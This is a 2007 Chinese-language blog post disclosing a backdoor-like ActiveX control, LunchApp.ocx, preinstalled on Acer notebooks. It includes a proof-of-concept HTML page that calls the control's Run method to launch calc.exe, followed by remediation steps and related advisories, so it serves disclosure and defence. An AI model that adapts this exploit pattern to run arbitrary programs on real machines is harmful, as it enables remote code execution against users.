Shorten Url
Recommend to Front page
Trackbacks (1)- #1 by 艾克索夫實驗室 at 15 January, 2007 3:16
- 這篇是回應Roger在iThome的一篇文章, 密碼產生器,安全嗎? 我個人認為 OTP (One Time Password)的問題不在於其安不安全, 而在於夠不夠? 因為外界對於其安全性往往過於強調其演算法或是其核心引...
January 11,2007
acer notebook 出廠附贈後門一隻@@
有acer notebook的朋友 福氣啦~ 原廠附贈後門一隻
檢查硬碟裡有C:\windows\system\LunchApp.ocx的話,就恭喜囉..
POC: 把下面內容存成.htm,用ie打開(要enable activex)會跑計算機起來就再次恭喜...
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>
解決方法: 1.把C:\windows\system\LunchApp.ocx刪除或改名
2.還相信原廠patch的話 ftp://ftp.support.acer-euro.com/utilities/LaunchAppFix/AcerLAppFix.zip
延伸閱讀:
About Acer Notebook LunchApp.APlunch ActiveX Control....
天阿.. 2006.11.19就有人發佈囉..
Dangerous backdoor in Acer laptops [Update]
Acer 'preloads vulns' onto notebooks
[ More from this category: ]
Previous post in this category: Gmail 信件大量消失?
Next post in this category: zone-h 又被黑了 @@
Previous post in this category:
Gmail 信件大量消失?Next post in this category:
zone-h 又被黑了 @@Trackback URL
Trackbacks (1)
Comments(0)
Comment Permissions: Allow commenting
